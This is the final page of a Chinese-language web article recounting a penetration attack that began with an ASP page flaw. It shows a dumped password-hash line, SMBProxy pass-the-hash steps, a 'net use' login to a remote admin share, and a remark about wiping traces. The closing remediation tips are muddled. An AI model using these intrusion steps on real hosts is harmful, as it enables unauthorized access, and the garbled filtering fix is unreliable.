您现在的位置: 无忧电子商务网 >> 信息学院 >> 程序开发 >> asp >> 正文

一次用ASP页面漏洞引发的渗透攻击

作者:佚名    信息学院来源:整理    点击数:    更新时间:2008-1-24 我要参与讨论

  TsInternetUser:1000:1987DC7B3DE4A42761541729CD9CDFDD:28212D01DDEF0A91BA9022173515E9A6:::

…………………………

转换完毕

1. 停掉本机server服务,因为此程序默认使用127.0.0.1的139端口

net stop server

2. 运行本程序

smbproxy -s target -f pwdump3.txt 好了

3. 通过本地代理登陆远程主机

net use * \\127.0.0.1\c$ 123456/user:administrator

哈!成功!

其实,不用SMBProxy也只不过是为了快一点登录,使用LC4破解也是可行的,主要还是因为我很懒……

擦出了痕迹,归还了权限,我就撤退了,呵呵!

后记:关于ASP漏洞的补救,我不是很在行,只是提一些建议吧!

将user = Trim(Request(“user”))改为user = Replace(Trim(Request(“user”)),” ”,” ’ ”) 以实现 ” ‘ ” 的过滤(被替换为空格)。

数据库的下载是我猜解的,但是有这样的一种方法是绝对可行的。ASP使用一个连接文件将数据导入数据库文件这个文件一般以inc为扩展名,而且一般命名为conn.inc如果将它下载下来,就意味着数据库路径的暴露,所以要将conn..inc改为asp后缀,同时把数据库文件也改为asp扩展名并修改连接文件中的相关语句。

对于上传文件限制的代码,我就不太懂了,不过有很多资料啊!

其实系统的安全只不过是站点安全的一个重要组成部分,服务程序(web页面)的漏洞也会导致系统安全防线的崩溃,这次渗透功击就是一个例子。

上一页  [1] [2] [3] [4] 

在google里搜索更多一次用ASP页面漏洞引发的渗透攻击

Google
Web www.51ec.org
【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
我来说两句 对此文章发表了评论
  昵 称: *必填    ·注册用户·
  评 分: 1分 2分 3分 4分 5分     严禁发表危害国家安全、政治、黄色淫秽等内容的评论,用户需对自己在使用本网站服务过程中的行为承担法律责任。本站管理员有权保留或删除评论内容,评论内容只代表机友个人观点,与本网站立场无关。  
评 论
内 容

 
评论列表 (最新 评论仅限网友观点!)

供求信息




| 设为首页 | 加入收藏 | 关于我们 | 广告服务 | 联系方式 | 友情链接 | 版权申明